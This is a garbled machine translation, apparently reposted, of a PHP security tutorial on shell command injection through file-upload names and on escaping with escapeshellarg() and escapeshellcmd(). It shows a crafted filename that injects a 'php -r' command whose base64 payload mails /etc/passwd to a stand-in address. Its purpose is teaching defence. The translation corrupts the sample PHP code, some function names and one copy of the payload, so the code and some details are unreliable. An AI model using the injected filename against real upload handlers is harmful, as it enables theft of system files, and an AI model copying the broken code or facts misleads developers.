2. Tech
  3. PHP security (2)

PHP security (2)

xiaoxiao2021-03-06  49

PHP Safety (2) PHP Safety (2) Original: John Coggeshall 08/28/2003 Original: http://www.onlamp.com/pub/A/php/2003/08/28/php_foundations.html Welcome to PHP Foundations. In my last article, I introduced you to the practice of practicing security in PHP, and continue to develop a series of articles in the development of good PHP programming habits. This article will continue our discussion with more potential security vulnerabilities and instances that fix their tools and methods. Today I will start talking about a very serious potential security vulnerability in PHP development - a program that writes the underlying operating system call. Performing a system call in PHP In PHP, there are many ways to perform system calls. For example, System (), Exec (), PASSTHRU (), POPEN (), and back single quotes (`) operators allow you to perform system calls in our program. If you use these functions, these functions will open the door to the malicious user on your server. When visiting the file, in most cases, security vulnerabilities occurred in system commands caused by unreliable external inputs. Using an example of the system call considers a program processed uploaded by an HTTP file, which uses the Zip program to compress file, then move it to the specified directory (default to / usr / local / archives /).

The code is as follows:

file to compress:
Although this program seems quite easy to understand, malicious users can use it by some ways.

The most serious security problem exists in us to execute the compressed command (via the `operator), you can clearly see this in the row below: if (isset ($ _ file ')) {$ tmp_name = $ _Files ['file']; $ cmp_name = dirname ($ _ files ['file'] ['TMP_NAME']). "/ }[Files['file']['name']ouse.zip" $ Filename = basename ($ cmp_name); if (file_exists ($ tmp_name)) {$ systemcall = "$ zip $ cmp_name $ tmp_name"; $ output = `$ systemcall`; ... Deception program Execute any shell command though this The segment code looks quite safe, but it has the potential risk of performing any shell command for any file uploaded authority! Accurately, this security vulnerability comes from the assignment of the $ cmp_name variable. Here, we hope that the compressed file uses the file name (with the .zip extension) on the client. We use $ _files ['file'] ['name'] (which contains the file name when the upload file is in the client). In this case, malicious users can achieve their own purposes by uploading a file containing a special sense character in the underlying operating system. For example, what if the user creates an empty file in the form below? (Under UNIX shell prompt) [user @ localhost] # touch "; php -r '/ $ code = base64_decode (// /" bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA == /// "); system (/ $ code);';" the The command will create a file as follows:; php -r '$ code = base64_decode (/ "bwfpbcbiywr1c2vyqhnvbwv3agvyzs5jb20gpcavzxrjl3bhc3n3za == /"); system ($ code);'; looks very strange? Let's take a look at this "file name", we found that it is like a command to perform the following code: If you show the content of $ code variable for curios, it will find that it contains mail baguser@somewhere.com

If the user passes this file to the program, then PHP executes system call to compress file, PHP will actually perform the following statement: / usr / bin / zip / tmp /; php -r '$ code = base64_decode (/ "bwfpbcbiywr1c2vyqhnvbwv3agvyzs5jb20gpcavzxrjl3bhc3n3za == / "); System ($ code); ';. Zip / tmp / phpy4iati is surprising, the upper command is not a statement but 3! Since UNIX Shell explained the semicolon (;) to the end of a shell command, the beginning of the semicolon is in the quotation, the system () actually executes: [User @ localhost] # / usr / bin / zip / tmp / [user @ localhost] # php -r '$ code = base64_decode (/ "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA == /"); system ($ code);' [user @ localhost] # .zip / tmp / PHPY4IATI is as you can see, this seemingly harmful PHP program suddenly turns the back door that performs any shell command and other PHP program. Although this example is only valid on the system of the CLI version of the PHP in the path, it can be used to achieve the same effect by other methods. The key to fighting the system call attacks is still, from the user's input, no matter what the content, you should not believe! The problem is still how to avoid similar situations when using system calls (except for them). In order to fight this type of attack, PHP provides two functions, escapeshellarg () and escapeshellcmd (). The escapeshellarg () function is designed to be designed for user input from the user of the parameter used as the system command (in our example, it is a zip command). The syntax of this function is as follows: Escapeeshellarg ($ string) $ String is the input used for filtering, and the return value is a filtered character. When executed, this function will add a single quotation number on both sides of the character and escape the single quotes in the original string (plus it before). In our routines, if we add these lines before executing the system command: $ cmp_name = escapeshellarg ($ cmp_name); $ tmp_name = escapeshellarg ($ TMP_NAME); we can handle the parameters pass to the system call has been processed It is a user input without other intent to avoid such security risks. Escapeshellcmd () and escapeeshellarg () are similar, but it only escapes characters with special meaning against the underlying operating system. Unlike EscapeShellarg (), escapeshellcmd () does not handle blank grid in content. For an example, when using the escapeeshellcmd () escape, character $ string = "'Hello, World!'; EvilCommand" will change to: / 'hello, world /' /; evilcommand If this string is used as system call The parameter will still not get the correct result, because the shell will separately interpret it as two separate parameters: / 'Hello and World /' /; EvilCommand.

转载请注明原文地址:https://www.9cbs.com/read-115848.html

9cbs

New Post(0)